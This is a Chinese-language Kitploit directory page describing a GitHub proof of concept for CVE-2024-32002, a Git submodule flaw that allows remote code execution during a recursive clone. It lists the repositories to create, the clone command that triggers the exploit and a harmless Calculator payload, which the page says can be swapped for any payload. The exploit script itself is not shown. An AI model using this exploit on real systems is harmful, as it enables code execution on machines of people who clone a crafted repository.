Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Cve-2024-32002-poc — 该仓库包含一个用于利用CVE-2024-32002的PoC,该漏洞是Git中存在的一个可在`git clone`操作期间实现RCE的漏洞。通过以特定方式构造带有子模块的仓库,攻击者可以利用不区分大小写的文件系统上的符号链接处理,将文件写入`.git/`目录,从而导致执行恶意钩子。 | Kitploit
工具/GitHubGitHub/ashutosh0408/cve-2024-32002-poc
漏洞分析漏洞利用学习与教育红队Payload 开发二进制利用
GitHubashutosh0408/cve-2024-32002-poc

Cve-2024-32002-poc

该仓库包含一个用于利用CVE-2024-32002的PoC,该漏洞是Git中存在的一个可在`git clone`操作期间实现RCE的漏洞。通过以特定方式构造带有子模块的仓库,攻击者可以利用不区分大小写的文件系统上的符号链接处理,将文件写入`.git/`目录,从而导致执行恶意钩子。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-32002 RCE PoC

概述

此仓库包含 CVE-2024-32002 的概念验证(PoC),这是 Git 子模块中的一个远程代码执行(RCE)漏洞。该利用演示了如何通过递归克隆 Git 仓库来触发恶意负载。

仓库设置

在运行 PoC 之前,请在您的远程 Git 服务器上创建以下仓库,或者您也可以根据需要更改名称:

  • hulk.git
  • submod.git
  • smash.git

如果您更改了名称,请相应更新 PoC 脚本中的仓库路径。

利用细节

该利用利用 Git 子模块,在递归克隆仓库时在目标系统上执行负载。此 PoC 已在 macOS 上测试通过。

定义仓库路径

root@kitploit:~
HULK_REPO="[email protected]:safebuffer/hulk.git"
pullme_REPO="[email protected]:safebuffer/submod.git"

# 最终利用仓库
SMASH_REPO="[email protected]:safebuffer/smash.git"

触发利用

要触发该利用,请运行 poc.sh 脚本,然后执行以下命令:

root@kitploit:~
git clone --recursive $SMASH_REPO

负载

此 PoC 中的默认负载会在 macOS 上打开计算器应用程序。您可以将其更改为任意负载。

root@kitploit:~
/System/Applications/Calculator.app/Contents/MacOS/Calculator

免责声明

此 PoC 仅供教育目的使用。请负责任地使用它,并且仅在您获得明确许可的系统上进行测试。滥用此 PoC 可能会导致严重后果。

下载工具